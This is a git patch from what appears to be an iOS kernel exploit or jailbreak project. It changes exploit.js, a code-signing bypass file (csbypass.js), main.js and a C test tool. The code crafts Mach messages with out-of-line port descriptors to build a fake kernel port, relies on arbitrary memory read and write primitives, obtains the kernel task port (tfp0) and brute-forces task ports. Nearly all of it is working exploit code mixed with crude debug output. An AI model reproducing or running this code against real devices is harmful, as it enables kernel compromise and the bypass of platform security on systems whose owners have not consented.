From 42647b796f0f54122e7f46522d8e681825daf54b Mon Sep 17 00:00:00 2001 From: spv420 Date: Fri, 15 Jul 2022 15:03:50 -0400 Subject: dump --- src/js/csbypass.js | 2 +- src/js/kexp/exploit.js | 8 +++++--- src/js/main.js | 6 ++++-- tools/testlol.c | 26 +++++++++++++++++++------- 4 files changed, 29 insertions(+), 13 deletions(-) diff --git a/src/js/csbypass.js b/src/js/csbypass.js index 8f7a56e..3065099 100644 --- a/src/js/csbypass.js +++ b/src/js/csbypass.js @@ -38,7 +38,7 @@ function memcpy_exec(dst, src, size) { printf("fuck you test=%p %p %p\n", test, pitch, read_u32(dict)); scall("printf", "%x %x %x %x\n", read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide()), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 4), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 8), read_u32(CFDictionarySetValue_addr + get_dyld_shc_slide() + 12)); callnarg(CFShow_addr + get_dyld_shc_slide(), dict); - callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceBytesPerRow), read_u32(my_kIOSurfaceBytesPerRow + 4), read_u32(my_kIOSurfaceBytesPerRow + 8), read_u32(my_kIOSurfaceBytesPerRow + 12), test); + call4arg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(read_u32(my_kIOSurfaceBytesPerRow)), test, 0); printf("fuck1\n"); callnarg(CFDictionarySetValue_addr + get_dyld_shc_slide(), dict, read_u32(my_kIOSurfaceWidth), read_u32(my_kIOSurfaceWidth + 4), read_u32(my_kIOSurfaceWidth + 8), read_u32(my_kIOSurfaceWidth + 12), callnarg(CFNumberCreate_addr + get_dyld_shc_slide(), 0, kCFNumberSInt32Type, width)); printf("fuck2\n"); diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js index 8447c46..473bc6e 100755 --- a/src/js/kexp/exploit.js +++ b/src/js/kexp/exploit.js @@ -330,7 +330,7 @@ function r3gister(task, init_port_set, real_count, fake_count) { write_u32(InP + 0x18, 1); write_u32(InP + 0x1c, init_port_set); write_u32(InP + 0x20, real_count); - write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24))); + write_u32(InP + 0x24, 0x0213c600); write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0)); write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4)); write_u32(InP + 0x30, fake_count); @@ -349,8 +349,10 @@ function r3gister(task, init_port_set, real_count, fake_count) { function mach_ports_lookup_shit() { printf("fuck\n"); var arrz = shit_heap(4); + var arrz2 = shit_heap(4); printf("fuck\n"); - write_u32(arrz, 0); + write_u32(arrz, arrz2); + write_u32(arrz2, 0); printf("fuck\n"); var sz = shit_heap(4);; printf("fuck\n"); @@ -359,6 +361,7 @@ function mach_ports_lookup_shit() { // var mts = mach_task_self(); printf("fuck\n"); calls4arg("mach_ports_lookup", task_self, arrz, sz, 0); + scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("mpl success\n"); return read_u32(read_u32(arrz) + 8); @@ -461,7 +464,6 @@ again: while (true) { // while (true) { // // } - scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp)); printf("fuck\n"); // var fake_port = read_u32(read_u32(arrz) + 8); diff --git a/src/js/main.js b/src/js/main.js index 5c45e85..75d730d 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -77,14 +77,16 @@ function main() { large_buf[0] = 0x41424344; printf("%x\n", read_u32(large_buf_ptr)); + setup_fancy_rw(); + // csbypass(); // return; - setup_fancy_rw(); printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0')); - + +//return; var tfp0 = get_kernel_task(); printf("tfp0=%x\n", tfp0); diff --git a/tools/testlol.c b/tools/testlol.c index 85c9cb2..d39bf47 100755 --- a/tools/testlol.c +++ b/tools/testlol.c @@ -199,20 +199,23 @@ int main(int argc, char* argv[]) { Request *InP = &Mess.In; Reply *OutP = &Mess.Out; -#if 0 InP->msgh_body.msgh_descriptor_count = 1; - InP->init_port_set.address = (void*)(init_port_set); - InP->init_port_set.count = real_count; + InP->init_port_set.address = (void*)(0x41414141); + InP->init_port_set.count = 0x42424242; InP->init_port_set.disposition = 19; InP->init_port_set.deallocate = FALSE; InP->init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; InP->NDR = NDR_record; - InP->init_port_setCnt = fake_count; // was real_count + InP->init_port_setCnt = 0x43434343; // was real_count InP->Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE); - InP->Head.msgh_remote_port = task; - InP->Head.msgh_local_port = mig_get_local_port(); + InP->Head.msgh_remote_port = 0x45454545; + InP->Head.msgh_local_port = 0x69696969; InP->Head.msgh_id = 3403; -#endif + + for (int i = 0; i < 0x100; i++) { + printf("%02x", ((uint8_t*)InP)[i]); + } + printf("\n"); printf(" InP->msgh_body.msgh_descriptor_count %p %p\n", ((void*)& InP->msgh_body.msgh_descriptor_count ) - ((void*)InP), sizeof( InP->msgh_body.msgh_descriptor_count )); printf(" InP->init_port_set.address %p %p\n", ((void*)& InP->init_port_set.address ) - ((void*)InP), sizeof( InP->init_port_set.address )); @@ -255,6 +258,15 @@ typedef struct { printf("%p\n", ((void*)ptraaa) - ((void*)kportaaa)); + printf("===validity check\n"); + + uintptr_t whatever; + + for (mach_port_t i = 0; i < 0x1000000; i++) { + if (pid_for_task(i, &whatever) == KERN_SUCCESS) + printf("0x%x\n", i); + } + #if 0 kern_return_t ret = mach_msg(&InP->Head, MACH_SEND_MSG|MACH_RCV_MSG|MACH_MSG_OPTION_NONE, (mach_msg_size_t)sizeof(Request), (mach_msg_size_t)sizeof(Reply), InP->Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); if(ret == KERN_SUCCESS) -- cgit v1.2.3